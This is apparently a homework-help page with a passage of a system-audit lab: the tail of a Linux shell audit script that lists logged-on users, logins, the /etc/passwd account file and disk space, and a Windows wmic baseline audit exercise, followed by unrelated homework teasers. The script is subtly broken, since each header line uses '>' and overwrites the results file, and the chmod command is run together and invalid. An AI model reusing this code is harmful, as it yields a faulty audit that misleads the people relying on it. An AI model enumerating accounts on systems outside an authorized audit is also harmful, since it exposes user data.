echo "===CURRENTLY LOGGED ON USER===" > $AUDIT_RESULTS
w >> $AUDIT_RESULTS

echo "===LAST LOGON===" > $AUDIT_RESULTS
last>> $AUDIT_RESULTS

echo "===ACCOUNTS===" > $AUDIT_RESULTS
cat /etc/passwd>> $AUDIT_RESULTS

echo "===DRIVE SPACE===" > $AUDIT_RESULTS
df -h >> $AUDIT_RESULTS

===END SCRIPT===

Press: "ctrl+x" and save the file with the name "linux.audit".

To make the script executable type: chmodu+xlinux.audit

To run the script type: ./linux.audit

To read the script output type: cat /tmp/audit_results

Part 10: Windows Baseline Audit Script Lab

This lab provides a real-world hands-on example of performing a baseline audit of a Windows system. In this lab you will use wmic and batch commands to query a Windows system for installed software, NICs, startup items, boot list, disk drives, environment variables, jobs, logons, network protocols, mapped drives, type of OS, installed hotfixes, running servers, shares, installed hardware, running services, user accounts, security groups, running processes, TCP/UDP connections, NetBIOS connections, system information, and scheduled tasks. As you can see, this basic baseline script captures a great deal of information for an auditor.

There are two reasons this baseline script uses basic wmic and batch file commands. The first reason is that any Windows system is able to run this script. There are no dependencies that need to be installed. The second reason is that even the most sensitive of Windows systems, systems that have been configured for unique use such as controllers or instruments will not lock up or crash when this script is run. It is important to know that this script may cause a system that is already using most of its resources for other operations to slow down considerably so execute the script with caution.

1. Right-click on the file titled "baseline.bat" and select "edit". Notice the wmic commands and batch file commands being used to query the Windows system. Now close the file.

2. Right-click on the file titled "baseline.bat" and select "Run as administrator".

3. A command prompt should have opened.

4. Press these buttons: ctrl+alt+del

5. Click: "Select Task Manager"
6. Click on the tab labeled: "Performance"

7. Click on the button labeled: "Resource Monitor"

8. Observe the resources being consumed, specifically, observe the CPU usage. What is taking up the most average CPU time?

9. Wait for the script to finish running. When the script is finished running you should have two documents. One titled "baseline.html" and another titled "baseline.txt".

10. Open the document "baseline.html" and scroll through it.

11. Open the document "baseline.txt" and scroll through it.

You now have an audit script to take with you and use during audits.

Reference no: EM131258803

Questions Cloud

Explain at least two change-management strategies : What change-management strategies are most useful for a nurse informaticist to be aware of when implementing a change within an organization? How can those strategies help to mitigate negative attitudes toward change?
Correspondence between information and established criteria : CPAs are often engaged to perform services other than audit services. Discuss the following services provided by CPAs. "The accumulation and evaluation of evidence about information to determine and report on the degree of correspondence between the ..
What are the advantages of cycle counting : When quantity discounts are offered, why is it not necessary to check discount points that are below the EOQ or points above the EOQ that are not discount points?
Objectives of any business is to be efficient : "We're both busy, so I'll get right to the point," he says. "One of the main objectives of any business is to be efficient. Without efficiency, the company is essentially losing money. Am I right?"
What new domains did you identify : This is an introduction to using search engines for penetration testing. "Google Hacking" is a valuable skill for penetration testers. What new domains did you identify?
Government spending using the is-lm model : Suppose a liquidity trap exists. Graphically illustrate and explain the effects of an increase in government spending using the IS-LM model.
What are the advantages of cycle counting : When quantity discounts are offered, why is it not necessary to check discount points that are below the EOQ or points above the EOQ that are not discount points?
Define specific aspects of proposed policy or policy change : Identify the type of legislation, such as state, federal, scope of practice, reimbursement, loan repayment, or others. Review of the literature consists of a minimum of 3-4 peer-reviewed articles and 6-7 other outside sources. Describe the current po..
Effective partnership relationship between management : Using research evidence, critically evaluate the key factors for an effective partnership relationship between management and a trade union - Critically analyse Nasser's strategy of encouraging employees to form a trade union.

Reviews

Write a Review

Operating System Questions & Answers

  What is turning out to be the wireless standard

Are there any one standard coming about in the wireless industry which seems to be taking the lead over the others.

  Design an improved interactive password system

Design an improved interactive password system? Present your design and describe what kind of attacks your protocol can protect.

  What are the major challenges that an os designer faces in

1.concurrency of course is a requirement for modern operating systems. what are the major challenges that an os

  Uses this divide-and-average algorithm

Write a program that reads values for x, a, and the small error allowance and then uses this divide-and-average algorithm to find the approximate square root of x

  Program of law of total probability

Think about a system that generates ten million audit records every day. Also suppose that there are on average 10 attacks per day on this system and that each such attack is reflected in twenty records.

  How is file management utilized and managed

What tools can you use? For those of you who work, how is file management managed in your place of business?"

  Question 1a process is a program under execution and as it

question 1a process is a program under execution and as it executes it changes state. the state of a process is defined

  Differences between the internet, intranets, extranets

Discuss similarities and differences between the Internet, intranets, extranets. Define e-Commerce and discussow can e-Commerce businesses be categorized?

  Android application that reads an ip address

Need to wrigh an android application that reads an IP address of a device, connect to it then switch it on/off using telnet.

  Prepare a paper about must pertain to operating systems

Prepare a Research paper about Must pertain to operating systems.

  Develop a checklist that ibm analysts could use

Develop a checklist that IBM analysts could use in consulting projects that could help advice clients as they make a choice between Windows or Linux operating system software for their Web servers

  When a process is multithreaded

Explain the differences, advantages, and disadvantages between user and kernel threads. What are the advantages and disadvantages of a lightweight process?

Free Assignment Quote

Assured A++ Grade

Get guaranteed satisfaction & time on delivery in every assignment order you paid with us! We ensure premium quality solution document along with free turntin report!

Submit Assignment

Academics

Major Subjects

Majors

Get In Touch

whatsapp: +1-415-670-9521

Phone: +1-415-670-9521

Email: [email protected]

TERMS & POLICIES

HELP & SUPPORT

All rights reserved! Copyrights ©2019-2020 ExpertsMind IT Educational Pvt Ltd